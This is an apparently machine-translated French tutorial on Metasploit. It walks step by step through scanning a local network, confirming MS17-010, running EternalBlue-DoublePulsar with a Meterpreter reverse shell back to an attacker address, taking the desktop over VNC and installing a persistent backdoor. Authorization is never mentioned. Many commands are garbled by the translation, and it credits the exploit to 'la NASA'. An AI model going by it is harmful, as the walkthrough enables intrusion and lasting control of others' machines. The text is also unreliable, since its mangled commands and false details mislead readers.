Tutoriel de métasploit

Tutoriel de métasploit

Comme nous avons discuté du top 25 de l'outil Best Kali Linux, et nous avons d'abord mis Metasploit dans la liste, discutons et découvrons maintenant Metasploit. Nous vous recommandons de vous familiariser avec Metasploit.

Métasploit initialement créé par h. D Moore en 2003, jusqu'à ce qu'il soit acquis et développé plus loin par Rapid7 le 21 octobre 2009. Metasploit-Framework est entièrement écrit à l'aide de Ruby, et est un package standard installé dans le système Kali Linux (et aussi presque tous les tests de test de pénétration, je suppose). Il s'agit d'un kit préféré des pirates ou des testeurs de pénétration pour rechercher des vulnérabilités de sécurité, développer et exécuter des exploits sur des cibles et d'autres développement de la sécurité.

Metasploit est livré avec plusieurs éditions, généralement divisées en deux catégories, version gratuite et version payante. Les versions gratuites: Metasploit Framework Community Edition (interface basée sur la CLI) et Armitage (interface basée sur l'interface graphique). Les versions payantes: Metasploit Express, Metasploit Pro et Cobalt Strike (il est similaire avec Armitage, qui est fourni par Strategic Cyber ​​LLC).

Metasploit permet aux utilisateurs de créer (ou de développer) leur propre code d'exploitation, mais ne vous inquiétez pas si vous ne savez pas coder, Metasploit a tant de modules et qu'ils sont en permanence mis à jour. Actuellement, Metasploit compte plus de 1600 exploits et 500 charges utiles. Le moyen simple de comprendre ce que sont les exploits et les charges utiles, un exploit est essentiellement la façon dont l'attaquant livre la charge utile, à travers le trou de vulnérabilité du système cible. Une fois que l'attaquant lance l'exploit qui contient une charge utile contre une cible vulnérable, la charge utile déployée (charge utile utilisée pour se connecter à l'attaquant pour obtenir un accès à distance contre le système cible), à ​​ce stade, l'exploit est effectué et devient non pertinent.

"Metasploit ne pirate pas l'outil instantané, c'est un framework insensé"

Cet article Metasploit vise à effectuer des tests de pénétration contre un système cible en utilisant le flux suivant:

  • Analyse de vulnérabilité
  • Évaluation de la vulnérabilité
  • Exploitant
  • Gagner Access à distance - Posséder le système

PRÉPARATION

Assurez-vous que notre Kali Linux a la dernière version mise à jour. Il y aura des améliorations dans chaque mise à jour. Exécutez les commandes suivantes:

~ # Mise à jour apt
~ # APT APPOSITION -Y
~ # apt Dist-mise à niveau -y

Une fois notre machine à jour, commençons maintenant par tirer la console Metasploit. Dans le terminal, type:

~ # msfconsole

Et vous avez également besoin d'un éditeur de texte, d'un Gedit ou de Leafpad, pour collecter des informations en cours de route avant de compiler l'attaque. Tout d'abord, identifiez votre adresse IP de l'interface sans fil, l'IP du routeur et le masque de réseau.

Sur la base des informations ci-dessus, nous note la note de l'adresse IP du WLAN1 et du routeur, et le masque de réseau. Donc, la note devrait ressembler à ceci:

IP d'attaquant (LHOST): 192.168.1.56
IP de passerelle / routeur: 192.168.1.1
Masque de réseau: 255.255.255.0 (/ 24)


Étape 1: Analyse de vulnérabilité

Dans la console Metasploit, nous recueillons ensuite d'abord des informations, telles que l'adresse IP cible, le système d'exploitation, les ports ouverts et la vulnérabilité. Metasploit nous permet d'exécuter NMAP directement à partir de la console. Sur la base des informations ci-dessus, exécutez cette commande pour accomplir notre tâche de collecte d'informations.

msf> nmap -v 192.168.1.1/24 - Script vuln -pn -o

De la commande ci-dessus, nous avons obtenu le résultat ci-dessous.

Nous avons obtenu une cible vulnérable exécutant le système d'exploitation Windows, et le vulnérable est sur le service SMBV1. Alors, ajoutez à la note.

IP cible (Rhost): 192.168.1.57
Vulnérabilité: Exécution de code distant Vulnérabilité dans les serveurs Microsoft SMBV1 (MS17-010)


Étape 2: Évaluation de la vulnérabilité

Maintenant, nous connaissons la cible et sa vulnérabilité. Vérifions la vulnérabilité de la console Metasploit

Maintenant, nous connaissons la cible et sa vulnérabilité. Vérifions la vulnérabilité dans la console Metasploit à l'aide du module auxiliaire SMB_SCANNER. Exécutez la commande suivante:

MSF> Utiliser les oids / scanner / smb / smb_ms17_010
MSF Auxiliary (SMB_MS17_010)> Définir les rhosts [IP cible]
MSF Auxiliary (SMB_MS17_010)> Exécuter

Metasploit est confiant sur la vulnérabilité, et il montre l'édition exacte de Windows OS. Ajouter à la note:

Target OS: Windows 7 Ultimate 7600


Étape 3: Exploiter

Malheureusement, Metasploit n'a pas de module d'exploitation lié à cette vulnérabilité. Mais ne vous inquiétez pas, il y a un gars à l'extérieur exposé et a écrit le code d'exploitation. L'exploit est familier, car il est initié par la NASA, il s'appelle EternalBlue-DoublePulsar. Vous pouvez le saisir à partir d'ici, ou vous pouvez suivre le guide de la vidéo Tutorial ci-dessous pour installer le code d'exploitation sur votre framework Metasploit.

Une fois que vous avez suivi le guide ci-dessus, (assurez-vous que le chemin est le même que le tutoriel). Maintenant, vous êtes prêt à exploiter la cible. Exécutez les commandes suivantes:

Utilisez Exploit / Windows / Smb / EternalBlue_DoublePulsar
Définir Windows / Meterpreter / Reverse
Définir ProcessInject Spoolsv.exe
Set Rhost 192.168.1.57
Set Lhost 192.168.1.56

Exploiter

Boom… L'exploit réussit, nous avons eu la session de mètres. Comme je l'ai mentionné plus tôt, une fois l'exploit lancé, il déploiera la charge utile, qui est ici, nous avons utilisé, Windows /mètre/ reverse_tcp.


Étape 4: Gagner un accès à distance

Permet d'explorer les commandes les plus disponibles, entrez '?'(sans instance) et voir les commandes disponibles disponibles. Le Stdapi, Les commandes système sont:

Pour voir plus d'informations sur le système cible, utilisez 'sysinfo' commande. La sortie devrait ressembler à ceci.

Depuis que nous injectons au processus système plus tôt (Spoolsv.exe), nous avons eu le privilège du système. Nous possédons la cible. Nous pouvons faire beaucoup avec la commande à la cible. Par exemple, nous pourrions exécuter RDP, ou simplement définir la télécommande VNC. Pour exécuter le service VNC Entrée en entrepôt:

~ # exécuter vnc

Le résultat devrait être le bureau de machine cible, il ressemble à ceci.

La partie la plus importante est de créer une porte dérobée, donc chaque fois que la cible déconnectée à notre machine, la machine cible essaiera de se connecter à nouveau à nous. La résidence arrière est utilisée pour maintenir l'accès, c'est comme la pêche, vous ne jeterez pas votre poisson à l'eau une fois que vous aurez obtenu le poisson, à droite? Vous voulez faire quelque chose avec le poisson, que ce soit pour l'économiser au réfrigérateur pour d'autres actions, comme la cuisson ou la vendre pour de l'argent.

Meterpreter a cette fonction de dérobée constante. Exécutez la commande suivante et jetez un œil aux paramètres et arguments disponibles.

mètre mètre> faire la persistance -h

Si vous n'êtes pas à l'aise avec ce script obsolète, le nouveau module de persistance est sous post / windows / manage / persistance_exe. Vous pouvez l'explorer plus loin par vous-même.

Metasploit est énorme, ce n'est pas seulement un outil, c'est un cadre, considérez qu'il a plus de 1600 exploits et environ 500 charges utiles. Un article est juste adapté à la vue d'ensemble de l'utilisation générale ou de l'idée. Mais, vous avez tellement appris de cet article.

«Plus vous suivez le flux d'attaque, plus vous avez un défi sans effort."